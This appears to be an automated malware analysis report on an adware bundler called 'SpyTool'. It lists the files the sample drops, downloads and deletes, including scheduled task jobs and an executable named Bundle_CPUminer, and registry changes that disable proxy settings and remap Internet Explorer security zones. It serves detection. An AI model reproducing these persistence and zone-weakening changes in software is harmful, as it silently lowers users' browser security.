%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\av.txt (0 bytes)
The process 2835.exe:792 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\chrome.packed.7z (1424068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\agoda.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282\DD109E04-9249-4175-ABE-CCF37DDE4282.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\walmart.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%WinDir%\Tasks\DD109E04-9249-4175-ABE-CCF37DDE4282.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ikea.ico (2993 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282\DD109E04-9249-4175-ABE-CCF37DDE4282.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282 (0 bytes)
%WinDir%\Tasks\DD109E04-9249-4175-ABE-CCF37DDE4282.job (0 bytes)
The process encrypt.exe:644 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.exe (92831 bytes)
The process encrypt.exe:1796 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.exe (31991 bytes)
The process encrypt.exe:1900 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.exe (1271 bytes)
The process encrypt.exe:1484 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.exe (24254 bytes)
The process upgmsd_re_005010082.exe:380 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
The process nsd33.tmp:432 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh37.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\CPUFeatures.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\inetc.dll (20 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\CPUFeatures.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\inetc.dll (0 bytes)
The process nskA.tmp:1676 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfF.tmp (17738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1D.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VISWHQk[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3C.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vos[1].htm (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc43.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw13.tmp (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsc14.tmp:1452 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi16.tmp (0 bytes)
Registry activity
The process nsb27.tmp:1920 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 42 2C 88 A7 C5 1A 8A 3A 37 A7 64 BC 62 21 37"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst20.tmp:1040 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 11 4B 05 03 E9 58 DA 3C B5 64 8D FB 75 3B 34"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
